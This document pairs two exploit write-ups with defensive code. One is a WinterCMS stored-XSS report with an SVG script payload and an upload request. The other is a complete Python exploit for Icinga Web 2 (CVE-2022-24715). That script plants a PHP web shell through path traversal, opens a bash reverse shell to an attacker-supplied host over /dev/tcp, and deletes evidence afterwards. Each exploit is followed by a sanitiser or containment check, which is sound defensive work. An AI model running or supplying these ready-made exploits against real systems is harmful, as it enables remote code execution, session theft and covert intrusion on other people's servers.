<pre><code># Exploit Title: WinterCMS < 1.2.3 - Persistent Cross-Site Scripting
# Exploit Author: abhishek morla
# Google Dork: N/A
# Date: 2023-07-10
# Vendor Homepage: https://wintercms.com/
# Software Link: https://github.com/wintercms/winter
# Version: 1.2.2
# Tested on: Windows 64-bit / Mozilla Firefox
# CVE : CVE-2023-37269
# Report Link : https://github.com/wintercms/winter/security/advisories/GHSA-wjw2-4j7j-6gc3
# Video POC : https://youtu.be/Dqhq8rdrcqc

Title : Application is Vulnerable to Persistent Cross-Site Scripting via SVG File Upload in Custom Logo Upload Functionality

Description :
WinterCMS < 1.2.3 does not restrict SVG files from being uploaded as the website logo, making it vulnerable to persistent cross-site scripting (XSS). The vulnerability arises because an attacker can embed malicious JavaScript in an SVG file that is then displayed to all users, including anonymous visitors. Consequently, any user interaction with the affected page can inadvertently trigger execution of the malicious script.

Payload:-
// image.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.cookie);
  </script>
</svg>

//Post Request

POST /backend/system/settings/update/winter/backend/branding HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: fk93d30vmHCawwgMlTRy97vPOxaf4iPphtUwioc2
X-WINTER-REQUEST-HANDLER: formLogo::onUpload
Content-Type: multipart/form-data; boundary=---------------------------186411693022341939203410401206
Content-Length: 608
Origin: http://172.17.0.2
Connection: close
Cookie: admin_auth=eyJpdiI6IkV2dElCcWdsZStzWHc5cDVIcFZ1bnc9PSIsInZhbHVlIjoiVFkyV1k3UnBKUVNhSWF2NjVNclVCdXRwNklDQlFmenZXU2hUNi91T3c5aFRTTTR3VWQrVVJkZG5pcFZTTm1IMzFtZzkyWWpRV0FYRnJuZ1VoWXQ0Q2VUTGRScHhVcVRZdWtlSGYxa1kyZTh0RXVScFdySmF1VDZyZ1p0T1pYYWI5M1ZmVWtXUkhpeXg2U0l3NG9ZWHhnPT0iLCJtYWMiOiIyNzk0OTNlOWY2ODZhYjFhMGY0M2Y4Mzk0NjViY2FiOWQ0ZjNjMThlOTkxODZjYmFmNTZkZmY3MmZhMTM3YWJlIiwidGFnIjoiIn0%3D; BBLANG=en_US; winter_session=eyJpdiI6ImJFWHVEb0QrTmo5YjZYcml6Wm1jT3c9PSIsInZhbHVlIjoiQVdVZ3R4ajVUWUZXeS83dkhIQVFhVVYxOE1uajJQOVNzOUtwM1ZGcUFYOC9haHZFMlE2R0llNjZDWVR6eHZqbDZ5Z1J1akM5VkNaQUFZM1p5OGlZcjJFWTRaT21tRWdtcnJUUHJWRWg1QTZyRFhJbEdMc0h1SzZqaEphMFFSSDYiLCJtYWMiOiI0YzRkNWQwODVkMmI4ZmMxMTJlMGU5YjM2MWJkYjNiNjEwZmE2NTY4ZGQwYTdjNjAxMjRkMjRiN2M1NTBiOTNiIiwidGFnIjoiIn0%3D

-----------------------------186411693022341939203410401206
Content-Disposition: form-data; name="file_data"; filename="image.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.domain);
  </script>
</svg>

-----------------------------186411693022341939203410401206--

|-----------------------------------------EOF-----------------------------------------
</code></pre>
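The logo upload above accepts any SVG, and an SVG is an XML document that may carry `<script>` elements, event-handler attributes and `javascript:` links. The following is an added example, not WinterCMS code, of the server-side check a defender would run on an uploaded logo before storing it: parse the file with the standard library and reject anything that can execute or load active content. The three sample inputs are constructed; the first reproduces the report's payload.

```python
"""Validate an uploaded SVG before accepting it as a site logo.

Added example, not WinterCMS code. It parses the file with the standard
library and reports anything that can execute or load active content.
PAYLOAD_SVG is the SVG from the report above, reused as a constructed test
input; the other two samples are constructed as well.
"""
import re
import xml.etree.ElementTree as ET

# SVG elements that run script or embed foreign documents; a logo needs none of them.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object", "handler"}
# URL schemes that turn an href into code execution or an inline document.
ACTIVE_SCHEMES = re.compile(r"^\s*(javascript|data|vbscript)\s*:", re.IGNORECASE)


def _local(qname):
    """Strip the '{namespace}' prefix ElementTree puts on qualified names."""
    return qname.rsplit("}", 1)[-1].lower()


def svg_findings(data):
    """Return the reasons to reject the SVG; an empty list means it looks inert."""
    findings = []
    head = data[:4096].decode("utf-8", errors="replace")
    # A logo never needs a DTD; DOCTYPE/ENTITY open the door to XXE and entity expansion.
    if re.search(r"<!(DOCTYPE|ENTITY)", head, re.IGNORECASE):
        findings.append("DOCTYPE or ENTITY declaration")
    try:
        root = ET.fromstring(data)  # expat does not fetch the external DTD
    except ET.ParseError as exc:
        return findings + [f"not well-formed XML: {exc}"]
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for el in root.iter():
        name = _local(el.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append(f"<{name}> element")
        for attr, value in el.attrib.items():
            a = _local(attr)
            if a.startswith("on"):
                findings.append(f"event handler attribute 'on{a[2:]}' on <{name}>")
            elif a == "href" and ACTIVE_SCHEMES.match(value):
                findings.append(f"active URL scheme in href on <{name}>")
            elif a == "style":
                # url(#id) references inside the file are fine; anything else is external.
                for ref in re.findall(r"url\(([^)]*)\)", value, re.IGNORECASE):
                    if not ref.strip().strip("'\"").strip().startswith("#"):
                        findings.append(f"external url() reference in style on <{name}>")
    return findings


def is_safe_svg(data):
    """True when the SVG carries no active content and can be stored as a logo."""
    return not svg_findings(data)


# Constructed samples. PAYLOAD_SVG is the SVG from the report above.
PAYLOAD_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.cookie);
  </script>
</svg>
"""
CLEAN_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50">
  <polygon points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>
"""
HANDLER_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><rect width="1" height="1"/></svg>"""

if __name__ == "__main__":
    for label, sample in (("payload", PAYLOAD_SVG), ("clean", CLEAN_SVG), ("handler", HANDLER_SVG)):
        print(f"{label}: {'accept' if is_safe_svg(sample) else 'reject ' + str(svg_findings(sample))}")
```

The check is deliberately conservative: a logo that trips it should be converted to PNG or re-exported without the flagged parts rather than allowed through. Where SVG uploads must stay, the second layer is how they are served: a script inside an SVG only runs when the browser navigates to the file as a document, not when it is referenced from an `<img>` tag, so serving uploads from a separate origin, with `Content-Disposition: attachment`, or under a `Content-Security-Policy: sandbox` header removes the impact even if validation is bypassed.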
<pre><code>#!/usr/bin/env python3

# Exploit Title: Icinga Web 2.10 - Authenticated Remote Code Execution
# Date: 8/07/2023
# Exploit Author: Dante Corona (aka cxdxnt)
# Vendor Homepage: https://icinga.com/
# Software Link: https://github.com/Icinga/icingaweb2
# Version: <2.8.6, <2.9.6, <2.10
# Tested on: Icinga Web 2 Version 2.9.2 on Linux
# CVE: CVE-2022-24715
# Based on: https://nvd.nist.gov/vuln/detail/CVE-2022-24715

import requests, argparse, re, random, string
from colorama import Fore, Style


def letter_random():
    # Random six-letter name reused for the resource, the module and the request parameter.
    letras = string.ascii_lowercase
    character_random = random.choices(letras, k=6)
    return ''.join(character_random)


def users_url_password():
    parser = argparse.ArgumentParser(description='Descripción de tu programa.')
    parser.add_argument('-u', '--url', type=str, required=True, help='Insertar la URL http://ip_victima')
    parser.add_argument('-U', '--user', type=str, required=True, help='Insertar usuario -U user')
    parser.add_argument('-P', '--password', type=str, required=True, help='Insertar contraseña -P password')
    parser.add_argument('-i', '--ip', type=str, required=True, help='Insertar IP de atacante -i IP')
    parser.add_argument('-p', '--port', type=str, required=True, help='Insertar puerto de atacante -p PORT')
    args = parser.parse_args()
    url = args.url
    user = args.user
    password = args.password
    ip_attack = args.ip
    port_attack = args.port

    return url, user, password, ip_attack, port_attack


def login(url, user, password):
    # Authenticate with the supplied credentials; every later form post needs the session and a CSRF token.
    try:
        login_url = url + "/icingaweb2/authentication/login"
        session = requests.Session()
        r = session.get(login_url)
        csrf_regex = re.findall(r'name="CSRFToken" value="([^"]*)"', r.text)[0]
        data_post = {"username": user,
                     "password": password,
                     "CSRFToken": csrf_regex,
                     "formUID": "form_login",
                     "btn_submit": "Login"
                     }
        response = session.post(login_url, data=data_post)
        if "Welcome to Icinga Web!" in response.text:
            print(f"{Fore.GREEN}[*]{Style.RESET_ALL}Session successfully.")
            r = session.get(login_url)
        else:
            print("[!]Failed to login.")
            exit(1)
    except requests.exceptions.InvalidURL:
        print(f"{Fore.YELLOW}[!]{Style.RESET_ALL} Error URL :(")
        exit(1)
    return session, csrf_regex


def upload_file(session, url, character_random, csrf_regex):
    # The "private key" of a new SSH resource is written to disk under the path built from the
    # "user" field; the traversal in that field lands the file (key plus PHP tag) in /dev/shm.
    webshell = f"""-----BEGIN RSA PRIVATE KEY-----
MIIBOgIBAAJBAKj34GkxFhD90vcNLYLInFEX6Ppy1tPf9Cnzj4p4WGeKLs1Pt8Qu
KUpRKfFLfRYC9AIKjbJTWit+CqvjWYzvQwECAwEAAQJAIJLixBy2qpFoS4DSmoEm
o3qGy0t6z09AIJtH+5OeRV1be+N4cDYJKffGzDa88vQENZiRm0GRq6a+HPGQMd2k
TQIhAKMSvzIBnni7ot/OSie2TmJLY4SwTQAevXysE2RbFDYdAiEBCUEaRQnMnbp7
9mxDXDf6AU0cN/RPBjb9qSHDcWZHGzUCIG2Es59z8ugGrDY+pxLQnwfotadxd+Uy
v/Ow5T0q5gIJAiEAyS4RaI9YG8EWx/2w0T67ZUVAw8eOMB6BIUg0Xcu+3okCIBOs
/5OiPgoTdSy7bcF9IGpSE8ZgGKzgYQVZeN97YE00
-----END RSA PRIVATE KEY-----
<?php system($_REQUEST["%s"]);?>
""" % character_random
    upload_url = url + "/icingaweb2/config/createresource"
    r = session.get(upload_url)
    csrf = re.findall(r'name="CSRFToken" value="([^"]*)"', r.text)[0]
    data_post = {"type": "ssh",
                 "name": "shm/" + character_random,
                 "user": f"../../../../../../../../../../../dev/shm/{character_random}/run.php",
                 "private_key": webshell,
                 "formUID": "form_config_resource",
                 "CSRFToken": csrf,
                 "btn_submit": "Save Changes"
                 }
    upload_response = session.post(upload_url, data=data_post)
    check = requests.get(url + f"/icingaweb2/lib/icinga/icinga-php-thirdparty/dev/shm/{character_random}/run.php")
    if check.status_code != 200:
        print(f"{Fore.YELLOW}[!]{Style.RESET_ALL}Error uploading file. :(")
        exit(1)
    else:
        print(f"{Fore.GREEN}[*]{Style.RESET_ALL}File uploaded successfully.")


def enable_module(session, url, character_random):
    # Point the module path at /dev/shm and enable the dropped directory as a module so run.php is loaded.
    url_module = url + "/icingaweb2/config/general"
    r_module = session.get(url_module)
    csrf_module = re.findall(r'name="CSRFToken" value="([^"]*)"', r_module.text)[0]
    # Repeated keys mirror the browser form (hidden "0" then checkbox "1"); Python keeps the last value.
    data_post = {"global_show_stacktraces": "0",
                 "global_show_stacktraces": "1",
                 "global_show_application_state_messages": "0",
                 "global_show_application_state_messages": "1",
                 "global_module_path": "/dev/shm/",
                 "global_config_resource": "icingaweb2",
                 "logging_log": "none",
                 "themes_default": "Icinga",
                 "themes_disabled": "0",
                 "authentication_default_domain": "",
                 "formUID": "form_config_general",
                 "CSRFToken": f"{csrf_module}",
                 "btn_submit": "Save Changes"
                 }

    resul = session.post(url_module, data_post)
    #--------------------------------------------------
    url_enable = url + "/icingaweb2/config/moduleenable"
    r_enable = session.get(url_enable)
    csrf_enable = re.findall(r'name="CSRFToken" value="([^"]*)"', r_enable.text)[0]
    data_enable = {"identifier": f"{character_random}", "CSRFToken": f"{csrf_enable}", "btn_submit": "btn_submit"}
    resul_enable = session.post(url_enable, data_enable)


def reverse_shell(session, url, ip_attack, port_attack, character_random):
    # Commands reach system() through the random request parameter on any page that loads the module.
    reverse_url = url + "/icingaweb2/dashboard"
    reverse_exe_one = reverse_url + f'?{character_random}=echo+"bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{ip_attack}%2F{port_attack}%200%3E%261"+>+/tmp/{character_random}'
    reverse_exe_two = reverse_url + f"?{character_random}=bash+/tmp/{character_random} &"
    reverse_response_one = session.get(reverse_exe_one)
    try:
        # The shell keeps the request open, so the timeout is the success signal.
        reverse_response_two = session.get(reverse_exe_two, timeout=5)
    except requests.exceptions.RequestException:
        print(f"{Fore.RED}[*]{Style.RESET_ALL}Eliminating evidence")

    remove = session.get(reverse_url + f"?{character_random}=rm+/tmp/{character_random}")
    disable_url = url + "/icingaweb2/config/moduledisable"
    r_disable = session.get(disable_url)
    csrf_disable = re.findall(r'name="CSRFToken" value="([^"]*)"', r_disable.text)[0]
    data_disable = {"identifier": f"{character_random}", "CSRFToken": csrf_disable, "btn_submit": "btn_submit"}
    response_disable = session.post(disable_url, data=data_disable)


def disable_module(session, url, character_random):
    # Unused stub left by the author; the cleanup lives at the end of reverse_shell().
    url_disable = url + "/icingaweb2/config/moduledisable"


if __name__ == '__main__':
    character_random = letter_random()
    url, user, password, ip_attack, port_attack = users_url_password()
    session, csrf_regex = login(url, user, password)
    upload_file(session, url, character_random, csrf_regex)
    enable_module(session, url, character_random)
    reverse_shell(session, url, ip_attack, port_attack, character_random)
</code></pre>
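The script above works because the value an administrator types into the SSH resource's `user` field ends up as the path the private key is written to, and nothing stops `../` sequences from walking out of the resource directory. The following is an added example, not Icinga Web 2's code, of the check a defender would put in front of such a path join: a strict allowlist for the user-chosen component plus a realpath containment test. The base directory `/var/lib/icingaweb2/ssh` is an assumed placeholder, and the traversal string is the one from the exploit.

```python
"""Containment check for a user-supplied file name joined onto a server-side directory.

Added example; not Icinga Web 2 code. The base directory used in the demo is an
assumed placeholder and does not need to exist for the check to work.
"""
import os
import re

# Allowlist for the part of the path the user may choose: one path component,
# no separators, no leading dot, bounded length. This alone blocks "../".
SAFE_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,127}$")


class UnsafePathError(ValueError):
    """Raised when a supplied name would leave the base directory."""


def safe_resource_path(base_dir, name):
    """Return the absolute path base_dir/name, or raise UnsafePathError.

    Two independent checks: the allowlist rejects separators and traversal
    sequences outright, and the realpath comparison catches anything the
    allowlist cannot see, such as a symlink inside base_dir pointing elsewhere.
    """
    if not isinstance(name, str) or "\x00" in name:
        raise UnsafePathError("name must be a string without NUL bytes")
    if not SAFE_NAME.match(name):
        raise UnsafePathError(f"name {name!r} is not a single safe path component")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    # commonpath() rather than startswith(): "/srv/keys" must not accept "/srv/keys-other/x".
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafePathError(f"{candidate} is outside {base}")
    return candidate


def is_contained(base_dir, name):
    """Boolean wrapper around safe_resource_path for callers that only need a verdict."""
    try:
        safe_resource_path(base_dir, name)
        return True
    except UnsafePathError:
        return False


if __name__ == "__main__":
    BASE = "/var/lib/icingaweb2/ssh"  # assumed placeholder directory
    # Constructed inputs: a benign name, the traversal string from the exploit, and two variants.
    for name in ("abcdef",
                 "../../../../../../../../../../../dev/shm/abcdef/run.php",
                 "abcdef/../x",
                 ".ssh"):
        verdict = "accepted" if is_contained(BASE, name) else "rejected"
        print(f"{name!r:62} -> {verdict}")
```

The allowlist is the real fix; the realpath comparison is defence in depth for the cases a regex cannot judge, such as symlinks already present under the base directory. The same shape applies to the other inputs the script abuses: a module identifier should satisfy the same single-component rule, and a configurable module path such as `global_module_path` should be compared against an administrator-defined allowlist of directories rather than accepted verbatim.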